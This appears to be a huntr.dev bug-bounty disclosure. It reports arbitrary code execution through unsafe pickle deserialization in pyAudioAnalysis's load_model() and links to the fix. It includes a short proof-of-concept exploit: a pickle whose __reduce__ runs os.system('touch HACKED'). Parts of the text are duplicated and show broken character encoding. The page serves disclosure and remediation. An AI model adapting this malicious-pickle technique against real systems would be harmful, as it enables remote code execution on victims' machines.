pyAudioAnalysis is an open Python library that provides a wide range of audio-related functionalities focusing on feature extraction, classification, segmentation and visualization issues. This package is vulnerable to Arbitrary Code Execution.
š» Technical Description *
The function load_model() blindly loads a pickle file without any validation making it vulnerable to Arbitrary Code Execution. If the input pickle file is a malicious payload, create a file remotely.
š Proof of Concept (PoC) *
import pickle
import os
from pyAudioAnalysis import audioTrainTest as aT
class EvilPickle(object):
def __reduce__(self):
return (os.system, ('touch HACKED', ))
payload = pickle.dumps(EvilPickle())
with open('MEANS', 'wb') as file:
file.write(payload)
aT.load_model('')
https://huntr.dev/users/d3m0n-r00t has fixed the Arbitrary Code Execution vulnerability šØ. Think you could fix a vulnerability like this?
Get involved at https://huntr.dev/
Q | A Version Affected | ALL Bug Fix | YES Original Pull Request | https://github.com/418sec/pyAudioAnalysis/pull/2 Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/other/pyAudioAnalysis/1/README.md
User Comments:
š Metadata *
Fixed Arbitrary code execution in
pyAudioAnalysisBounty URL: https://www.huntr.dev/bounties/1-other-pyAudioAnalysis
āļø Description *
pyAudioAnalysisis an open Python library that provides a wide range of audio-related functionalities focusing on feature extraction, classification, segmentation and visualization issues. This package is vulnerable toArbitrary Code Execution.š» Technical Description *
The function
load_model()blindly loads a pickle file without any validation making it vulnerable toArbitrary Code Execution. If the input pickle file is a malicious payload, create a file remotely.š Proof of Concept (PoC) *
š„ Proof of Fix (PoF) *
For subprocess
š User Acceptance Testing (UAT)
Applied fix from pickle official fix as explained in here. https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html